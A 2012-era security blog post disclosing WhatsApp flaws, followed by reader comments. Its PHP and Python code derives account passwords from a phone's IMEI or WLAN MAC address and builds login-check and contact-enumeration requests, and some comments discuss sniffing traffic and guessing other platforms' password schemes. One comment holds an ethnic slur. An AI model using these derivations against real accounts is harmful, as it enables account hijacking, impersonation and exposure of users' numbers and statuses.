WhatsApp is broken, really broken

WhatsApp, the extremely popular instant messaging service for smartphones that delivers about one billion messages per day, has some serious security problems. I will try to give a detailed analysis of some of the issues.

Encryption

Until August 2012, messages sent through the WhatsApp service were not encrypted in any way; everything was sent in plaintext. Anybody on the same public WiFi network was able to sniff incoming and outgoing messages (including file transfers), and public WiFi is merely the most convenient vantage point: whoever runs the access point, the ISP or carrier, and anybody else on the network path sees the same plaintext. The company claims that the latest version of the software encrypts messages, without giving any details on what cryptographic methods they are using, which is a bad sign: it is safe to assume they did not do it the right way, with public-key cryptography. Update: their encryption is broken

However, the user's mobile phone number is still being transferred in plaintext: WhatsApp still revealing users phone number after encryption update

Authentication

The authentication is a security nightmare. On Android, the password is an MD5 hash of the reversed IMEI number:

<?php
$imei = "112222223333334"; // example IMEI
$androidWhatsAppPassword = md5(strrev($imei)); // reverse IMEI and calculate md5 hash
echo $androidWhatsAppPassword; // 32 hex characters; this is the "udid" used below

On iOS devices the password is generated from the device's WLAN MAC address:

<?php
$wlanMAC = "AA:BB:CC:DD:EE:FF"; // example WLAN MAC address
$iphoneWhatsAppPassword = md5($wlanMAC.$wlanMAC); // calculate md5 hash using the MAC address twice
echo $iphoneWhatsAppPassword; // 32 hex characters; this is the "udid" used below

The username is the user's mobile phone number, which an attacker will usually already know.

The IMEI can be obtained if you have physical access to the phone or if you control an app installed on the user's device. The WLAN MAC address is in the header of every 802.11 frame the phone sends, so a wireless sniffer in range reads it even when the network itself is encrypted. Neither value is secret, neither can be changed without changing the device, and the derivation adds no secret of its own, so knowing the identifier is knowing the password. Congratulations, you can now take over a user's WhatsApp account¹. But how? Well, some people have done an excellent job reverse engineering the WhatsApp protocol. There is a working PHP class available that contains everything needed to build your own WhatsApp client: https://github.com/venomous0x/WhatsAPI

Got a smartphone with WhatsApp installed? Try it out against your own account using the URLs known from the reverse engineered API!

https://r.whatsapp.net/v1/exist.php?cc=$countrycode&in=$phonenumber&udid=$password

$countrycode = the country calling code
$phonenumber = the users phone number (without the country calling code)
$password = see above: for iPhone use md5($wlanMAC.$wlanMAC), for Android use md5(strrev($imei)). Note that the WhatsApp UDID has nothing to do with the Apple UDID; it is something completely different.

If you did everything right, the server will answer with an XML document:

<?xml version="1.0" encoding="UTF-8"?>
<exist>
<response status="ok" result="xxxxxxxxxxx"/>
</exist>
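
As an added example (not code from the original post or from WhatsAPI), here is the password derivation and the exist.php lookup above in Python. Nothing is sent over the network: the block builds the URL and parses a constructed reply shaped like the XML above. The input validation and the assumption that the MAC is formatted exactly as in the example above (uppercase hex, colon separated) are mine; the post does not say how the client formats it.

```python
# Added example, not code from the original post or from WhatsAPI: derive the
# device-bound WhatsApp "password" as the post describes, build the exist.php
# request and parse its XML reply. Nothing is sent over the network; the reply
# below is a constructed sample shaped like the one quoted in the post.
import hashlib
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlencode


def md5_hex(s: str) -> str:
    """Lowercase hex MD5 of an ASCII string, as PHP's md5() returns it."""
    return hashlib.md5(s.encode("ascii")).hexdigest()


def android_password(imei: str) -> str:
    """Android client: md5(strrev(IMEI)). An IMEI is 14 or 15 decimal digits."""
    if not re.fullmatch(r"[0-9]{14,15}", imei):
        raise ValueError("IMEI must be 14 or 15 digits")
    return md5_hex(imei[::-1])


def iphone_password(wlan_mac: str) -> str:
    """iOS client: md5(MAC . MAC). Assumption: the MAC is formatted exactly like
    the post's example (uppercase hex, colon separated); the post does not say
    how the client formats it, and a different case or separator would yield a
    different hash."""
    if not re.fullmatch(r"(?:[0-9A-F]{2}:){5}[0-9A-F]{2}", wlan_mac):
        raise ValueError("MAC must look like AA:BB:CC:DD:EE:FF")
    return md5_hex(wlan_mac + wlan_mac)


def exist_url(country_code: str, number: str, password: str) -> str:
    """The exist.php lookup from the post: cc is the country calling code,
    in= the subscriber number without it, udid the derived password."""
    query = urlencode({"cc": country_code, "in": number, "udid": password})
    return "https://r.whatsapp.net/v1/exist.php?" + query


def parse_exist_response(body: bytes) -> dict:
    """Pull status and result out of the <exist><response .../></exist> reply."""
    root = ET.fromstring(body)
    if root.tag != "exist":
        raise ValueError("unexpected root element %r" % root.tag)
    resp = root.find("response")
    if resp is None:
        raise ValueError("reply has no <response> element")
    return {"status": resp.get("status"), "result": resp.get("result")}


# Constructed sample reply, shaped like the XML quoted in the post.
SAMPLE_EXIST_REPLY = b"""<?xml version="1.0" encoding="UTF-8"?>
<exist>
<response status="ok" result="xxxxxxxxxxx"/>
</exist>
"""

if __name__ == "__main__":
    # Both "secrets" are static device identifiers; knowing one is knowing the password.
    pw_android = android_password("112222223333334")
    pw_iphone = iphone_password("AA:BB:CC:DD:EE:FF")
    print("android udid:", pw_android)
    print("iphone udid: ", pw_iphone)
    print(exist_url("49", "1511234567", pw_android))
    print(parse_exist_response(SAMPLE_EXIST_REPLY))
```

The derivation is deterministic and unsalted, so there is nothing to brute-force and nothing to leak: whoever reads the IMEI or sniffs the MAC has the udid immediately.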

Privacy

When WhatsApp starts it will send all numbers from your phone's address book to the WhatsApp servers and check which numbers are registered with WhatsApp.

This is done like this:

https://sro.whatsapp.net/client/iphone/iq.php?cd=1&cc=$countrycode&me=$yournumber&u[]=$friend1&u[]=$friend2&u[]=$friend3&u[]=$friend4

$countrycode = the country calling code
$yournumber = while this SHOULD be your number, it is not required; the server accepts any number here, and note that the request carries no udid parameter at all
$friendX = phone number (without the country calling code) from the address book that will be checked; u[] is an array, so it is possible to check multiple numbers with one request

The server will answer with an XML property list showing all numbers (hits) that are registered with WhatsApp. This will look something like this:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
    <dict>
        <key>P</key>
        <string>1234567890</string>
        <key>T</key>
        <integer>10817</integer>
        <key>S</key>
        <string>Some Status Message</string>
        <key>JID</key>
        <string>23xxxxxxxxx</string>
        <key>NP</key>
        <true/>
    </dict>
</array>
</plist>

Key “P” is the user's phone number, key “T” seems to be the uptime (?), key “S” is the user's status message. Not sure about “JID” (Update: JID is the Jabber ID, thanks) and “NP” yet; if you have a smart guess let me know. All this information is public: anybody who can send the request above gets it, for any number they care to ask about.
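
The contact-sync lookup and the plist reply above, as an added example in Python (not code from the original post or from WhatsAPI). It builds the iq.php request for a batch of candidate numbers and parses a constructed reply modelled on the one above into a per-number answer, which is what makes the endpoint an enumeration oracle: only hits come back, so a number missing from the reply is not a WhatsApp user. The field names are the ones observed in the post; nothing is sent over the network.

```python
# Added example, not code from the original post or from WhatsAPI: build the
# contact-sync lookup from the post for a batch of candidate numbers and parse
# the plist reply into a per-number answer. Nothing is sent over the network;
# the reply below is a constructed sample shaped like the one quoted in the post.
import plistlib
from urllib.parse import quote


def sync_url(country_code: str, me: str, candidates) -> str:
    """iq.php request: one u[] parameter per candidate number. The post notes
    that me= is not verified by the server, and the request carries no udid."""
    parts = ["cd=1", "cc=" + quote(country_code), "me=" + quote(me)]
    parts += ["u[]=" + quote(str(n)) for n in candidates]
    return "https://sro.whatsapp.net/client/iphone/iq.php?" + "&".join(parts)


def parse_sync_reply(body: bytes) -> list:
    """Flatten the plist <array> of <dict>s. Keys as observed in the post:
    P = phone number, T = unknown integer, S = status message,
    JID = Jabber ID, NP = boolean flag of unknown meaning."""
    records = []
    for entry in plistlib.loads(body):
        records.append({
            "phone": entry.get("P"),
            "t": entry.get("T"),
            "status": entry.get("S"),
            "jid": entry.get("JID"),
            "np": bool(entry.get("NP", False)),
        })
    return records


def registered_numbers(candidates, body: bytes) -> dict:
    """Map each candidate to its record if the server listed it, else None.
    Only hits come back, so a missing number is not a WhatsApp user: this is
    the enumeration oracle the post describes, answered without any password."""
    hits = {r["phone"]: r for r in parse_sync_reply(body)}
    return {str(n): hits.get(str(n)) for n in candidates}


# Constructed sample reply, shaped like the plist quoted in the post.
SAMPLE_SYNC_REPLY = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
    <dict>
        <key>P</key>
        <string>1234567890</string>
        <key>T</key>
        <integer>10817</integer>
        <key>S</key>
        <string>Some Status Message</string>
        <key>JID</key>
        <string>23xxxxxxxxx</string>
        <key>NP</key>
        <true/>
    </dict>
</array>
</plist>
"""

if __name__ == "__main__":
    candidates = ["1234567890", "1234567891"]
    print(sync_url("49", "1511234567", candidates))
    for number, record in registered_numbers(candidates, SAMPLE_SYNC_REPLY).items():
        print(number, "->", record if record else "not registered")
```

Because u[] is an array and me= is unchecked, the same request that syncs a real address book also answers "is this number on WhatsApp, and what is their status?" for an arbitrary list of numbers.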

Local database encryption

Since this requires physical access to the device or a full backup (in both cases you are in trouble anyway), this is less interesting, but still worth a note. In most cases it is possible to obtain the WhatsApp message history from an encrypted device or backup; for details read this paper: WhatsApp Database Encryption Project Report

Conclusion

Do not use WhatsApp. Really, don't.

¹ Actually, you can't: it's against the law. That being said, I did not hijack anybody's WhatsApp account during this research and neither should you. This information is for educational purposes only.

133 thoughts on “WhatsApp is broken, really broken”

  1. Fred Grott

    I had the opportunity to interview with these clowns for an Android dev role several moons ago. Needless to say I gave up after they refused to listen to the above concerns.

    Your concerns have been known for a while.

  2. ija

    We should all start using our regular XMPP accounts now! Most of us already have one. If you have a Gmail, Fastmail, Lavabit, GMX, Ovi.com or Yandex email address, you are ready to go. All that's left to do: install Xabber or IM+ or something similar on your smartphone!

    If you also want to instant message on your laptop: The latest Thunderbird comes with XMPP support! Or give Jitsi or one of the many alternatives a try! Enjoy!

    1. ADL Walrus

      Really? Are there any mature, non-Java, cross-platform replacements for Jitsi that provide OTR encryption for Jingle audio and video chatting?

      If so, I’d really like to hear about them.

    2. Ramazan

      IM+ is not secure either :). A few months ago I checked the packets of IM+ using Wireshark and observed that all your packets go over a third-party server (probably owned by these IM+ guys). I mean, the XMPP packets go to a server that is not the one your Jabber account resides on… Seems like MitM…

  5. Government enemy

    Great article!

    I will continue using WhatsApp though (at least until my iPhone 5 arrives), since there's currently no alternative with the same number of users.

    1. S

      You are the government’s friend if you only correspond on unencrypted channels. Not a bad thing to be the government’s friend I guess, but definitely not their enemy.

  6. Michael Whalen

    These guys may be “clowns” and their infrastructure might have some pretty interesting security holes… but they have a shit ton of investment money and even more users. They're doing something right.

      1. Faisal Abid

        Having a “shit ton” of investment money doesn’t guarantee a successful future. They keep this shit up and soon they’ll be “pivoting”.. and we all know what that means.

      1. marco b.

        The huge success is due to the ability to easily connect with your friends via the cellphone numbers already inside your phone.

        It really gives a ton of useful functions with zero effort from the user, so the security is even more of a problem.

        I hope they will fix the issue. Meanwhile I use a proxy with an on-the-fly replacement of my number with a bait one, just to test.

        peace&love

        1. lomifeh

          The same thing they do with a cloned cell phone. Use it for illegal purposes while pinning it on someone else if tracked.

        1. Sam

          UDID is an MD5 hash of 2x WLAN MAC, and the phone number is being transferred without encryption. There you have everything.

          The WhatsApp UDID is not to be confused with the Apple UDID.

          1. Shant

            If you stay on 3G and home WiFi (obviously your home WiFi needs to be encrypted), then you should be safe for now.

  7. Kupsztal

    The super annoying thing is that their most recent update broke the app on the iPhone 4S, and they not only seem not to be aware of the problem, but also seem to ignore any messages, tweets or iTunes comments. Unless they're going through an acquisition and couldn't be bothered with users at the moment ;)

  8. n00badmin

    It is very important for users to be made aware of this vulnerability; however, the reality is that if you avoid public WiFi networks it is very unlikely someone could be in a position to sniff your traffic (not impossible, but unlikely over a cell carrier network or on an encrypted home access point).

    It has been well documented that WhatsApp sends unencrypted traffic, yet the reality is they have likely decided the chances of this happening are very small, assuming the encryption of wireless carriers would suffice.

        1. Anonymous

          Viber is Israeli. You can bet the Israelis are spying on every single Viber user on earth. Never ever trust an Israeli with anything. Ever.

    1. Anonymous

      Do not use KakaoTalk, because its privacy policies are dangerous for security. There was phishing in Korea, and almost all of the users are annoyed by the ‘featured friend’ function.

  9. Pooja

    I tried Hike and I love it. It has all the nice features like group chat and file transfer and, in addition, free SMS (to India). And it doesn't have any such security issues, and they respond to their users' concerns so promptly. But unfortunately it only supports India as of now.

  10. zhu

    I think anyone who is communicating information using IM will be using a BlackBerry. Most people using WhatsApp are probably not that concerned with security. But still, it is a big issue that needs to be resolved.

  12. Robin

    I have done some research on my own, mostly looking at the media sharing function. The images you send are hosted on a public website; you just have to find the URL.

    If someone intercepts your message, he will have that URL. The same goes for someone having access to your message database, even when you've deleted the file from your phone.

    For example: I just sent this picture to my girlfriend while sniffing my WiFi. The result is a URL looking like this: https://mms504.whatsapp.net/d6/15/00/6/1/6169eeec03dc50f69456497508a9466c.jpg

    Now what I have found out is that the URL isn't completely random. In fact, nothing is (with the exception of two unknown values).
    If you'd break it down it comes to this:
    https://mms[server number, usually 300, 400 or 500].whatsapp.net/[d0-d11, no idea what this is]/[day of upload, 00]/[hour of upload, 00 PST]/[hash first letter]/[hash second letter]/[hash].jpg

    Anyone any idea on what the D stands for? And what the hash is made of?

    1. Alex

      Maybe the D is the month, since it's 0-11. In your case it's 6, and you said that you just sent the picture, so I'll assume that means September. September is the 9th month, and adjusting for 0-style counting that makes it number 8.

      However, just because it isn't the right number doesn't necessarily mean it isn't the month. Maybe they assigned some random order to the months for “added security”, which seems like something they would do.

      1. Robin

        Thing is: it changes per message. Also I think the way it is set up right now is using day and hour folders, so an image never exists for longer than a month, and they just replace images in a new month, making server cleanup unnecessary.

        1. indrora

          > Doesn't require server cleanup

          No, it does, since this looks to be an MD5 hash (they seem to be fond of those) and thus is unique (to some degree), and unless they've done something stupid and said

          $hash = md5($to.$from.date("%M%D".time()));

          it is highly unlikely that there will be a collision between two messages (and here, you would have to send a lot of photos for them to be inaccessible).

          More than likely, they've said

          $hash = md5($to.$from.time().md5_file($file_uploaded));

          which would require you to send the same picture to the same person from the same account at the exact (within 1s) same time.

          1. Robin

            Oh yeah, you're right.

            One thing I did notice, though, is that if you upload the same image twice you get the same URL! Even with some time in between uploads.

      1. Robin

        In this case I just looked it up in the SQL database in data/data/apps. However, you can sniff it using Wireshark and a MITM attack.

  14. Manuel

    If you are concerned about your privacy, just don't use WhatsApp through public WiFi networks and don't share top secret information; this way maybe you will be safe. You also have to consider that WA is an ad-free, FREE product that has some security issues you have to deal with.

  16. YousefED

    The Windows Phone 7 client is also completely insecure (the global device ID is the password). I was able to create a WP7 app that sends and receives WhatsApp messages on the user's behalf in one evening (it only needs the phone number, which an app cannot directly get from the WP7 SDK).

    However, this means ANY app on a WP7 device only needs to prompt for a user's phone number and can communicate with WhatsApp on the user's behalf.

  17. Forever

    You cannot hack the account forever.
    In the super rare case that someone would actually be able to apply this in real life, which is very rare and this article really *really* over-exaggerates: don't be afraid, users ;), you can always log in on another device, which then locks in a new password which is unknown to the malicious user.

    Seriously, while the security is not optimal due to the simplicity for the users, it is not so highly insecure due to the hidden-away accounts. Basically: the chance of this happening to you is 1 in 250 million… and that's even a chance!
    Stop spreading so much nonsense baseless fear ;)

    1. Y110

      Oh yes, I can always log in from another smartphone!
      But that means that if someone hacks your WhatsApp account you have to buy a NEW phone!
      Absolutely nonsense baseless fear…

  18. Kyhwana

    Wait, isn’t it sending everything via HTTPS? Does it do cert checking?
    (Thinking of intercepting it via wifi against android users)

  19. Jakob

    Will Osama bin Laden kill me because he saw my WhatsApp msg to my girlfriend when I wrote her I'm in love with her? No.

    People could hear me talking in the subway; I don't care at all. Since I am not Jason Bourne everything is cool.

  23. zbuk

    The sad thing is when someone hijacks your account there's nothing to do; the hijacker can start impersonating you etc. Even if you don't use WhatsApp, your friends will just think you started using it like everyone else…

    1. dexymx

      I have just a very, very little dataset (around 4 friends xD), but in this case NP = Android. Anybody out there to disprove that?

  27. User773

    Hey,
    is anybody out there who has taken a closer look at WhatsAPI?
    What steps have you taken to work with it? Thank you :)

  28. Guest

    It is a simple messaging service. You guys do not work for the CIA, KGB, Mossad or any similar organization. The greatest risk involved here is the fact that somebody could get to see what you say to your girlfriend.
    Get over it. There is nothing major at risk. No lives will be put in danger and no money will be lost. WhatsApp is a great application. Period.

    1. Pyrocolada

      You clearly have no clue how identity fraud works: The info leaked by WhatsApp can be used to get your OTP for your bank account. We’ll see what happens when you complain to the bank that your money is missing, and they say: “Sorry, you made a huge transfer, not our problem.”

  30. cityhunt

    NP, in most cases, in coding stands for “Not Provided”, and it's used as a placeholder/anchor point. Good article btw :)
    UDIDs are not possibly unknown to app sellers/coders, and all this stuff you can sniff with Ethereal and tools like that is stored on THEIR server also. Can one of the critics above imagine what this could mean? :)

  31. Arturo Torres Sánchez

    Do you know how the Blackberry password is generated? I tried with MAC address and got nothing. I was going to use IMEI, but since my phone is CDMA, I’ve got MEID. I tried it too and it didn’t work.

    1. fileperms Post author

      Did you try exactly the methods that I posted? Using md5(WLANMAC.WLANMAC) or md5(strrev(IMEI))? I don't own a BlackBerry so I didn't have the chance to test this yet… if you need help with the md5 stuff please email me: admin@fileperms.org

      1. Arturo Torres Sánchez

        I tried md5(WLANMAC.WLANMAC) and md5(rev(MEID)) (which is different from the IMEI; I don't have this). None of them worked. I also tried with the BlackBerry's PIN.

        1. fileperms Post author

          The BB PIN would have been my next guess, maybe it's md5(PIN.PIN) or md5(strrev(PIN)), but that's just guessing. If I get my hands on a BB device I will do some testing.

  33. kminfo

    WhatsApp works without any bugs on the Android platform, and in terms of processor it performs amazingly on anything over 1 GHz, on Android versions from 2.2 up to the new Android Jelly Bean.

  36. potato

    NP seems to indicate whether the user is using iPhone or Android.
    iPhone clients will not have the NP flag, while Android clients will have the NP flag set to true.
    I have no idea what will happen to users using Nokia/BlackBerry. I don't have any WhatsApp friend using one of those phones :P

  37. Andreas

    Hi there,
    can anybody help me find the WhatsAPI from venomous? I can't find it online. Maybe someone of you can send me the file or the link for downloading it?

    Thanks a lot!

  40. Elspeth Chagall

    You've got to love Wireshark.

    But this is scary stuff. If it's this easy to get to someone's personal mobile phone info, what's the point? :( I love WhatsApp but this is very frightening news.

  41. Coma

    Any news regarding this issue? The Android app has received several updates since this post, the latest of which (version 2.8.7326) is supposed to include a “critical bug fix for connection issues”.

  42. enought with whatsupp

    Guys, my WhatsApp account was hacked today. I never use WiFi, only 3G, and I had the latest version of it. So I just simply uninstalled it and WILL NEVER USE IT AGAIN. It hurts when someone pretends to be you and says something stupid in all of your groups. When you go through it then you know it.

  43. Harshal

    Is it possible to use WhatsApp on 2 devices that run Android simultaneously?
    I tried the backup/restore method over the net, but the issue is I get messages on either of the devices, not both. Is it possible to get messages on both devices?

  46. RONZ

    Hi!
    Does anyone out there know why the WhatsApp icon appears twice on a Galaxy S2 every time it is downloaded? Could my WhatsApp get hijacked by someone simply entering my phone number and having my SIM (from behind my back, of course) to receive the security code on it, then entering it and starting to receive my messages on the hijacker's mobile?

  48. tommy

    Hi all,

    I tried to use the following URL just for fun:
    - https://r.whatsapp.net/v1/exist.php?…
    - https://r.whatsapp.net/v1/exist.php?cc=$countrycode&in=$phonenumber&udid=$password

    It seems it doesn't function!!!

    So, analyzing the traffic with Wireshark, I see the first packet sent to the server from the client is divided into two parts: the first (FIXED) contains the model of the phone and the telephone number, the second is a “VARIABLE” part that maybe works for the encryption of the session.

    What I have seen is that this second part (variable) changes every time a new session from the client to the server STARTS.

    Any idea about the encryption?

    THANKS ALL.

  50. Dynasty

    What exactly does it mean that people can take over your account??? Can they have access to your message history? Can they see everything you write and receive after they've taken over your account? Can they see all your contacts and their phone numbers?

    I first installed WhatsApp on my Android, and then when I bought a new smartphone I installed it there. It then automatically disconnected me from the old phone, so you can't use the app on two devices at the same time with the same account. So how exactly does the “hacker” get my private information if s/he doesn't log in with my account first? Wouldn't I immediately know if someone else logged in to my account? Or do they use another program?

    I also read on their support website that they do not recommend people installing WhatsApp on different devices with the same phone number or exchanging it between multiple devices, because it will eventually block your number from using WhatsApp. Is that true?

    Appreciate a fast reply, thank you :)))
    Great article! But, unfortunately, articles like these are more unsafe than the app itself… It's one thing to make someone aware of something bad and a whole other to “teach” someone how to do bad… just saying..

    1. fileperms Post author

      Hello there. First: please note this article was written back in September 2012; the WhatsApp team has fixed some of the flaws that are described here. Although an attacker cannot access the message history, he can send and receive messages using the hijacked account.

  51. KiDo

    Hello, I don't use WhatsApp so I know nothing about it.
    But my friend told me that someone added her on WhatsApp, and he could hack ALL her phone files, like pictures, message history… etc.
    He even sent her the pictures as proof.
    SO, , , is there such a thing??? Like hacking others' phones using WhatsApp???
    Is it really possible to be done?

  52. Asad

    Hello,

    I am going nuts, as for the past week my WhatsApp account has been returning the following error and not allowing me to use the application at all:
    “Your phone no …………. Is not allowed to use our service”

    It happened all of a sudden when I was sending a broadcast message to all my contacts. A screen appeared requesting to verify the phone number, and after adding the phone number it returns the above error.

    I have been writing WhatsApp support constantly but no response from their end.

    Please can someone help make my WhatsApp work on the same phone number.

    Thanks in advance!

    Asad

  53. asad

    Hello All,

    can anyone guide me on how I can solve the following error of WhatsApp on my BB9900, as it says my phone number is blocked or something.
    How can I unblock my number and use WhatsApp?

    Error: Your phone number +xxxxxxxxxx is no longer allowed to use our service.

    I have already written to WhatsApp support many times but no response even after a week has passed..

    Please assist

  54. Tshepi

    Hello

    Last year in November my phone couldn't send or receive WhatsApp messages for about a week; it said error. I couldn't even go into WhatsApp, and now 3 people who are my contacts received strange messages and they all think I sent them. I am 100% sure I didn't send them.
    Do you think my phone was hacked?
    How do I prove to everybody that I didn't send that message? I am desperate to prove my innocence.
